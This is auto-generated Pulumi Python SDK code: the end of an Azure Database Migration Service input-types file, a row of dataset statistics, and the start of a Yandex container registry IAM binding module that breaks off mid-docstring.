return pulumi.get(self, "certificate_name")
@certificate_name.setter
def certificate_name(self, value: pulumi.Input[str]):
pulumi.set(self, "certificate_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
Password to use for encrypting the exported certificate.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@pulumi.input_type
class ServiceSkuArgs:
def __init__(__self__, *,
capacity: Optional[pulumi.Input[int]] = None,
family: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[str]] = None,
tier: Optional[pulumi.Input[str]] = None):
"""
An Azure SKU instance
:param pulumi.Input[int] capacity: The capacity of the SKU, if it supports scaling
:param pulumi.Input[str] family: The SKU family, used when the service has multiple performance classes within a tier, such as 'A', 'D', etc. for virtual machines
:param pulumi.Input[str] name: The unique name of the SKU, such as 'P3'
:param pulumi.Input[str] size: The size of the SKU, used when the name alone does not denote a service size or when a SKU has multiple performance classes within a family, e.g. 'A1' for virtual machines
:param pulumi.Input[str] tier: The tier of the SKU, such as 'Free', 'Basic', 'Standard', or 'Premium'
"""
if capacity is not None:
pulumi.set(__self__, "capacity", capacity)
if family is not None:
pulumi.set(__self__, "family", family)
if name is not None:
pulumi.set(__self__, "name", name)
if size is not None:
pulumi.set(__self__, "size", size)
if tier is not None:
pulumi.set(__self__, "tier", tier)
@property
@pulumi.getter
def capacity(self) -> Optional[pulumi.Input[int]]:
"""
The capacity of the SKU, if it supports scaling
"""
return pulumi.get(self, "capacity")
@capacity.setter
def capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "capacity", value)
@property
@pulumi.getter
def family(self) -> Optional[pulumi.Input[str]]:
"""
The SKU family, used when the service has multiple performance classes within a tier, such as 'A', 'D', etc. for virtual machines
"""
return pulumi.get(self, "family")
@family.setter
def family(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "family", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The unique name of the SKU, such as 'P3'
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[str]]:
"""
The size of the SKU, used when the name alone does not denote a service size or when a SKU has multiple performance classes within a family, e.g. 'A1' for virtual machines
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def tier(self) -> Optional[pulumi.Input[str]]:
"""
The tier of the SKU, such as 'Free', 'Basic', 'Standard', or 'Premium'
"""
return pulumi.get(self, "tier")
@tier.setter
def tier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tier", value)
@pulumi.input_type
class SqlConnectionInfoArgs:
def __init__(__self__, *,
data_source: pulumi.Input[str],
type: pulumi.Input[str],
additional_settings: Optional[pulumi.Input[str]] = None,
authentication: Optional[pulumi.Input[Union[str, 'AuthenticationType']]] = None,
encrypt_connection: Optional[pulumi.Input[bool]] = None,
password: Optional[pulumi.Input[str]] = None,
platform: Optional[pulumi.Input[Union[str, 'SqlSourcePlatform']]] = None,
trust_server_certificate: Optional[pulumi.Input[bool]] = None,
user_name: Optional[pulumi.Input[str]] = None):
"""
Information for connecting to SQL database server
:param pulumi.Input[str] data_source: Data source in the format Protocol:MachineName\SQLServerInstanceName,PortNumber
:param pulumi.Input[str] type: Type of connection info
Expected value is 'SqlConnectionInfo'.
:param pulumi.Input[str] additional_settings: Additional connection settings
:param pulumi.Input[Union[str, 'AuthenticationType']] authentication: Authentication type to use for connection
:param pulumi.Input[bool] encrypt_connection: Whether to encrypt the connection
:param pulumi.Input[str] password: Password credential.
:param pulumi.Input[Union[str, 'SqlSourcePlatform']] platform: Server platform type for connection
:param pulumi.Input[bool] trust_server_certificate: Whether to trust the server certificate
:param pulumi.Input[str] user_name: User name
"""
pulumi.set(__self__, "data_source", data_source)
pulumi.set(__self__, "type", 'SqlConnectionInfo')
if additional_settings is not None:
pulumi.set(__self__, "additional_settings", additional_settings)
if authentication is not None:
pulumi.set(__self__, "authentication", authentication)
if encrypt_connection is None:
encrypt_connection = True
if encrypt_connection is not None:
pulumi.set(__self__, "encrypt_connection", encrypt_connection)
if password is not None:
pulumi.set(__self__, "password", password)
if platform is not None:
pulumi.set(__self__, "platform", platform)
if trust_server_certificate is None:
trust_server_certificate = False
if trust_server_certificate is not None:
pulumi.set(__self__, "trust_server_certificate", trust_server_certificate)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter(name="dataSource")
def data_source(self) -> pulumi.Input[str]:
"""
Data source in the format Protocol:MachineName\SQLServerInstanceName,PortNumber
"""
return pulumi.get(self, "data_source")
@data_source.setter
def data_source(self, value: pulumi.Input[str]):
pulumi.set(self, "data_source", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of connection info
Expected value is 'SqlConnectionInfo'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="additionalSettings")
def additional_settings(self) -> Optional[pulumi.Input[str]]:
"""
Additional connection settings
"""
return pulumi.get(self, "additional_settings")
@additional_settings.setter
def additional_settings(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "additional_settings", value)
@property
@pulumi.getter
def authentication(self) -> Optional[pulumi.Input[Union[str, 'AuthenticationType']]]:
"""
Authentication type to use for connection
"""
return pulumi.get(self, "authentication")
@authentication.setter
def authentication(self, value: Optional[pulumi.Input[Union[str, 'AuthenticationType']]]):
pulumi.set(self, "authentication", value)
@property
@pulumi.getter(name="encryptConnection")
def encrypt_connection(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to encrypt the connection
"""
return pulumi.get(self, "encrypt_connection")
@encrypt_connection.setter
def encrypt_connection(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "encrypt_connection", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Password credential.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def platform(self) -> Optional[pulumi.Input[Union[str, 'SqlSourcePlatform']]]:
"""
Server platform type for connection
"""
return pulumi.get(self, "platform")
@platform.setter
def platform(self, value: Optional[pulumi.Input[Union[str, 'SqlSourcePlatform']]]):
pulumi.set(self, "platform", value)
@property
@pulumi.getter(name="trustServerCertificate")
def trust_server_certificate(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to trust the server certificate
"""
return pulumi.get(self, "trust_server_certificate")
@trust_server_certificate.setter
def trust_server_certificate(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "trust_server_certificate", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[pulumi.Input[str]]:
"""
User name
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class ValidateMigrationInputSqlServerSqlDbSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ValidateSyncMigrationInputSqlServerTaskInputArgs']] = None):
"""
Properties for task that validates migration input for SQL to Azure SQL DB sync migrations
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ValidateMigrationInput.SqlServer.SqlDb.Sync'.
:param pulumi.Input['ValidateSyncMigrationInputSqlServerTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ValidateMigrationInput.SqlServer.SqlDb.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ValidateMigrationInput.SqlServer.SqlDb.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ValidateSyncMigrationInputSqlServerTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ValidateSyncMigrationInputSqlServerTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ValidateMigrationInputSqlServerSqlMISyncTaskInputArgs:
def __init__(__self__, *,
azure_app: pulumi.Input['AzureActiveDirectoryAppArgs'],
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]],
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
storage_resource_id: pulumi.Input[str],
target_connection_info: pulumi.Input['MiSqlConnectionInfoArgs'],
backup_file_share: Optional[pulumi.Input['FileShareArgs']] = None):
"""
Input for task that migrates SQL Server databases to Azure SQL Database Managed Instance online scenario.
:param pulumi.Input['AzureActiveDirectoryAppArgs'] azure_app: Azure Active Directory Application the DMS instance will use to connect to the target instance of Azure SQL Database Managed Instance and the Azure Storage Account
:param pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Connection information for source SQL Server
:param pulumi.Input[str] storage_resource_id: Fully qualified resourceId of storage
:param pulumi.Input['MiSqlConnectionInfoArgs'] target_connection_info: Connection information for Azure SQL Database Managed Instance
:param pulumi.Input['FileShareArgs'] backup_file_share: Backup file share information for all selected databases.
"""
pulumi.set(__self__, "azure_app", azure_app)
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "storage_resource_id", storage_resource_id)
pulumi.set(__self__, "target_connection_info", target_connection_info)
if backup_file_share is not None:
pulumi.set(__self__, "backup_file_share", backup_file_share)
@property
@pulumi.getter(name="azureApp")
def azure_app(self) -> pulumi.Input['AzureActiveDirectoryAppArgs']:
"""
Azure Active Directory Application the DMS instance will use to connect to the target instance of Azure SQL Database Managed Instance and the Azure Storage Account
"""
return pulumi.get(self, "azure_app")
@azure_app.setter
def azure_app(self, value: pulumi.Input['AzureActiveDirectoryAppArgs']):
pulumi.set(self, "azure_app", value)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for source SQL Server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="storageResourceId")
def storage_resource_id(self) -> pulumi.Input[str]:
"""
Fully qualified resourceId of storage
"""
return pulumi.get(self, "storage_resource_id")
@storage_resource_id.setter
def storage_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_resource_id", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['MiSqlConnectionInfoArgs']:
"""
Connection information for Azure SQL Database Managed Instance
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['MiSqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@property
@pulumi.getter(name="backupFileShare")
def backup_file_share(self) -> Optional[pulumi.Input['FileShareArgs']]:
"""
Backup file share information for all selected databases.
"""
return pulumi.get(self, "backup_file_share")
@backup_file_share.setter
def backup_file_share(self, value: Optional[pulumi.Input['FileShareArgs']]):
pulumi.set(self, "backup_file_share", value)
@pulumi.input_type
class ValidateMigrationInputSqlServerSqlMISyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ValidateMigrationInputSqlServerSqlMISyncTaskInputArgs']] = None):
"""
Properties for task that validates migration input for SQL to Azure SQL Database Managed Instance sync scenario
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ValidateMigrationInput.SqlServer.AzureSqlDbMI.Sync.LRS'.
:param pulumi.Input['ValidateMigrationInputSqlServerSqlMISyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ValidateMigrationInput.SqlServer.AzureSqlDbMI.Sync.LRS')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ValidateMigrationInput.SqlServer.AzureSqlDbMI.Sync.LRS'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ValidateMigrationInputSqlServerSqlMISyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ValidateMigrationInputSqlServerSqlMISyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ValidateMigrationInputSqlServerSqlMITaskInputArgs:
def __init__(__self__, *,
backup_blob_share: pulumi.Input['BlobShareArgs'],
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]],
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
backup_file_share: Optional[pulumi.Input['FileShareArgs']] = None,
backup_mode: Optional[pulumi.Input[Union[str, 'BackupMode']]] = None,
selected_logins: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input for task that validates migration input for SQL to Azure SQL Managed Instance
:param pulumi.Input['BlobShareArgs'] backup_blob_share: SAS URI of Azure Storage Account Container to be used for storing backup files.
:param pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Information for connecting to source
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Information for connecting to target
:param pulumi.Input['FileShareArgs'] backup_file_share: Backup file share information for all selected databases.
:param pulumi.Input[Union[str, 'BackupMode']] backup_mode: Backup Mode to specify whether to use existing backup or create new backup.
:param pulumi.Input[Sequence[pulumi.Input[str]]] selected_logins: Logins to migrate
"""
pulumi.set(__self__, "backup_blob_share", backup_blob_share)
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
if backup_file_share is not None:
pulumi.set(__self__, "backup_file_share", backup_file_share)
if backup_mode is not None:
pulumi.set(__self__, "backup_mode", backup_mode)
if selected_logins is not None:
pulumi.set(__self__, "selected_logins", selected_logins)
@property
@pulumi.getter(name="backupBlobShare")
def backup_blob_share(self) -> pulumi.Input['BlobShareArgs']:
"""
SAS URI of Azure Storage Account Container to be used for storing backup files.
"""
return pulumi.get(self, "backup_blob_share")
@backup_blob_share.setter
def backup_blob_share(self, value: pulumi.Input['BlobShareArgs']):
pulumi.set(self, "backup_blob_share", value)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to source
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to target
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@property
@pulumi.getter(name="backupFileShare")
def backup_file_share(self) -> Optional[pulumi.Input['FileShareArgs']]:
"""
Backup file share information for all selected databases.
"""
return pulumi.get(self, "backup_file_share")
@backup_file_share.setter
def backup_file_share(self, value: Optional[pulumi.Input['FileShareArgs']]):
pulumi.set(self, "backup_file_share", value)
@property
@pulumi.getter(name="backupMode")
def backup_mode(self) -> Optional[pulumi.Input[Union[str, 'BackupMode']]]:
"""
Backup Mode to specify whether to use existing backup or create new backup.
"""
return pulumi.get(self, "backup_mode")
@backup_mode.setter
def backup_mode(self, value: Optional[pulumi.Input[Union[str, 'BackupMode']]]):
pulumi.set(self, "backup_mode", value)
@property
@pulumi.getter(name="selectedLogins")
def selected_logins(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Logins to migrate
"""
return pulumi.get(self, "selected_logins")
@selected_logins.setter
def selected_logins(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "selected_logins", value)
@pulumi.input_type
class ValidateMigrationInputSqlServerSqlMITaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ValidateMigrationInputSqlServerSqlMITaskInputArgs']] = None):
"""
Properties for task that validates migration input for SQL to Azure SQL Database Managed Instance
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ValidateMigrationInput.SqlServer.AzureSqlDbMI'.
:param pulumi.Input['ValidateMigrationInputSqlServerSqlMITaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ValidateMigrationInput.SqlServer.AzureSqlDbMI')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ValidateMigrationInput.SqlServer.AzureSqlDbMI'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ValidateMigrationInputSqlServerSqlMITaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ValidateMigrationInputSqlServerSqlMITaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ValidateSyncMigrationInputSqlServerTaskInputArgs:
def __init__(__self__, *,
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbSyncDatabaseInputArgs']]],
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['SqlConnectionInfoArgs']):
"""
Input for task that validates migration input for SQL sync migrations
:param pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbSyncDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Information for connecting to source SQL server
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Information for connecting to target
"""
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbSyncDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbSyncDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to source SQL server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to target
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
| 41.554592
| 395
| 0.681169
| 14,765
| 138,917
| 6.202574
| 0.028446
| 0.105819
| 0.050535
| 0.036929
| 0.873991
| 0.840098
| 0.807176
| 0.783176
| 0.765901
| 0.73025
| 0
| 0.000138
| 0.215402
| 138,917
| 3,342
| 396
| 41.567026
| 0.840101
| 0.242965
| 0
| 0.729912
| 1
| 0
| 0.195569
| 0.126784
| 0
| 0
| 0
| 0
| 0
| 1
| 0.214101
| false
| 0.024365
| 0.00311
| 0
| 0.339036
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c7578b2f4d12da0bb581f35282ca75c5732438a6
| 16,926
|
py
|
Python
|
sdk/python/pulumi_yandex/container_registry_iam_binding.py
|
pulumi/pulumi-yandex
|
559a0c82fd2b834bb5f1dc3abbf0dab689b13a3e
|
[
"ECL-2.0",
"Apache-2.0"
] | 9
|
2021-04-20T15:39:41.000Z
|
2022-02-20T09:14:39.000Z
|
sdk/python/pulumi_yandex/container_registry_iam_binding.py
|
pulumi/pulumi-yandex
|
559a0c82fd2b834bb5f1dc3abbf0dab689b13a3e
|
[
"ECL-2.0",
"Apache-2.0"
] | 56
|
2021-04-20T11:31:03.000Z
|
2022-03-31T15:53:06.000Z
|
sdk/python/pulumi_yandex/container_registry_iam_binding.py
|
pulumi/pulumi-yandex
|
559a0c82fd2b834bb5f1dc3abbf0dab689b13a3e
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ContainerRegistryIamBindingArgs', 'ContainerRegistryIamBinding']
@pulumi.input_type
class ContainerRegistryIamBindingArgs:
def __init__(__self__, *,
members: pulumi.Input[Sequence[pulumi.Input[str]]],
registry_id: pulumi.Input[str],
role: pulumi.Input[str],
sleep_after: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a ContainerRegistryIamBinding resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] members: Identities that will be granted the privilege in `role`.
Each entry can have one of the following values:
* **userAccount:{user_id}**: A unique user ID that represents a specific Yandex account.
* **serviceAccount:{service_account_id}**: A unique service account ID.
* **system:{allUsers|allAuthenticatedUsers}**: see [system groups](https://cloud.yandex.com/docs/iam/concepts/access-control/system-group)
:param pulumi.Input[str] registry_id: The [Yandex Container Registry](https://cloud.yandex.com/docs/container-registry/) ID to apply a binding to.
:param pulumi.Input[str] role: The role that should be applied. See [roles](https://cloud.yandex.com/docs/container-registry/security/).
"""
pulumi.set(__self__, "members", members)
pulumi.set(__self__, "registry_id", registry_id)
pulumi.set(__self__, "role", role)
if sleep_after is not None:
pulumi.set(__self__, "sleep_after", sleep_after)
@property
@pulumi.getter
def members(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
Identities that will be granted the privilege in `role`.
Each entry can have one of the following values:
* **userAccount:{user_id}**: A unique user ID that represents a specific Yandex account.
* **serviceAccount:{service_account_id}**: A unique service account ID.
* **system:{allUsers|allAuthenticatedUsers}**: see [system groups](https://cloud.yandex.com/docs/iam/concepts/access-control/system-group)
"""
return pulumi.get(self, "members")
@members.setter
def members(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "members", value)
@property
@pulumi.getter(name="registryId")
def registry_id(self) -> pulumi.Input[str]:
"""
The [Yandex Container Registry](https://cloud.yandex.com/docs/container-registry/) ID to apply a binding to.
"""
return pulumi.get(self, "registry_id")
@registry_id.setter
def registry_id(self, value: pulumi.Input[str]):
pulumi.set(self, "registry_id", value)
@property
@pulumi.getter
def role(self) -> pulumi.Input[str]:
"""
The role that should be applied. See [roles](https://cloud.yandex.com/docs/container-registry/security/).
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: pulumi.Input[str]):
pulumi.set(self, "role", value)
@property
@pulumi.getter(name="sleepAfter")
def sleep_after(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "sleep_after")
@sleep_after.setter
def sleep_after(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "sleep_after", value)
@pulumi.input_type
class _ContainerRegistryIamBindingState:
def __init__(__self__, *,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
registry_id: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
sleep_after: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering ContainerRegistryIamBinding resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] members: Identities that will be granted the privilege in `role`.
Each entry can have one of the following values:
* **userAccount:{user_id}**: A unique user ID that represents a specific Yandex account.
* **serviceAccount:{service_account_id}**: A unique service account ID.
* **system:{allUsers|allAuthenticatedUsers}**: see [system groups](https://cloud.yandex.com/docs/iam/concepts/access-control/system-group)
:param pulumi.Input[str] registry_id: The [Yandex Container Registry](https://cloud.yandex.com/docs/container-registry/) ID to apply a binding to.
:param pulumi.Input[str] role: The role that should be applied. See [roles](https://cloud.yandex.com/docs/container-registry/security/).
"""
if members is not None:
pulumi.set(__self__, "members", members)
if registry_id is not None:
pulumi.set(__self__, "registry_id", registry_id)
if role is not None:
pulumi.set(__self__, "role", role)
if sleep_after is not None:
pulumi.set(__self__, "sleep_after", sleep_after)
@property
@pulumi.getter
def members(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Identities that will be granted the privilege in `role`.
Each entry can have one of the following values:
* **userAccount:{user_id}**: A unique user ID that represents a specific Yandex account.
* **serviceAccount:{service_account_id}**: A unique service account ID.
* **system:{allUsers|allAuthenticatedUsers}**: see [system groups](https://cloud.yandex.com/docs/iam/concepts/access-control/system-group)
"""
return pulumi.get(self, "members")
@members.setter
def members(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "members", value)
@property
@pulumi.getter(name="registryId")
def registry_id(self) -> Optional[pulumi.Input[str]]:
"""
The [Yandex Container Registry](https://cloud.yandex.com/docs/container-registry/) ID to apply a binding to.
"""
return pulumi.get(self, "registry_id")
@registry_id.setter
def registry_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "registry_id", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
The role that should be applied. See [roles](https://cloud.yandex.com/docs/container-registry/security/).
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
@property
@pulumi.getter(name="sleepAfter")
def sleep_after(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "sleep_after")
@sleep_after.setter
def sleep_after(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "sleep_after", value)
class ContainerRegistryIamBinding(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
registry_id: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
sleep_after: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
## yandex\_container\_registry\_iam\_binding
Allows creation and management of a single binding within IAM policy for
an existing Yandex Container Registry.
## Example Usage
```python
import pulumi
import pulumi_yandex as yandex
your_registry = yandex.ContainerRegistry("your-registry", folder_id="your-folder-id")
puller = yandex.ContainerRegistryIamBinding("puller",
registry_id=your_registry.id,
role="container-registry.images.puller",
members=["system:allUsers"])
```
## Import
IAM binding imports use space-delimited identifiers; first the resource in question and then the role. These bindings can be imported using the `registry_id` and role, e.g.
```sh
$ pulumi import yandex:index/containerRegistryIamBinding:ContainerRegistryIamBinding puller "registry_id container-registry.images.puller"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] members: Identities that will be granted the privilege in `role`.
Each entry can have one of the following values:
* **userAccount:{user_id}**: A unique user ID that represents a specific Yandex account.
* **serviceAccount:{service_account_id}**: A unique service account ID.
* **system:{allUsers|allAuthenticatedUsers}**: see [system groups](https://cloud.yandex.com/docs/iam/concepts/access-control/system-group)
:param pulumi.Input[str] registry_id: The [Yandex Container Registry](https://cloud.yandex.com/docs/container-registry/) ID to apply a binding to.
:param pulumi.Input[str] role: The role that should be applied. See [roles](https://cloud.yandex.com/docs/container-registry/security/).
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ContainerRegistryIamBindingArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## yandex\_container\_registry\_iam\_binding
Allows creation and management of a single binding within IAM policy for
an existing Yandex Container Registry.
## Example Usage
```python
import pulumi
import pulumi_yandex as yandex
